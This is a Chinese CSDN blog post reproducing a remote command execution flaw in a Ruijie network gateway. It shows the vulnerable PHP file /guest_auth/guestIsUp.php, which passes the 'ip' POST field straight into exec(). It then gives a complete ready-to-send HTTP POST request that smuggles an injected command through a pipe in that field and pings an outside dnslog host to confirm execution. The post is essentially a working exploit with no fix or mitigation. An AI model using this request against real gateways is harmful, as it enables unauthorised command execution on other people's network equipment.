锐捷网关 RCE复现

最新推荐文章于 2024-05-11 10:36:35 发布

qin9.

最新推荐文章于 2024-05-11 10:36:35 发布

阅读量2.7k

点赞数

文章标签：安全漏洞渗透测试

本文链接：https://blog.csdn.net/weixin_43227251/article/details/115616081

版权

在这里插入图片描述

请求路径

/guest_auth/guestIsUp.php

漏洞文件

<?php
    //查询用户是否上线了
    $userip = @$_POST['ip'];
    $usermac = @$_POST['mac'];

    if (!$userip || !$usermac) {
        exit;
    }
    /* 判断该用户是否已经放行 *
    $cmd = '/sbin/app_auth_hook.elf -f ' . $userip;
    $res = exec($cmd, $out, $status);
    /* 如果已经上线成功 */
    if (strstr($out[0], "status:1")) {
        echo 'true';
    }
?>

数据包

POST /guest_auth/guestIsUp.php HTTP/1.1
Host:
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Cookie: LOCAL_LANG_COOKIE=zh; UI_LOCAL_COOKIE=zh; sysmode=sys-mode%20gateway

ip=127.0.0.1|ping dnslog.cn &mac=00-00

在这里插入图片描述

qin9.

关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
锐捷网关 RCE复现

请求路径/guest_auth/guestIsUp.php漏洞文件<?php //查询用户是否上线了 $userip = @$_POST['ip']; $usermac = @$_POST['mac']; if (!$userip || !$usermac) { exit; } /* 判断该用户是否已经放行 * $cmd = '/sbin/app_auth_hook.elf -f ' . $userip; $r.
复制链接

扫一扫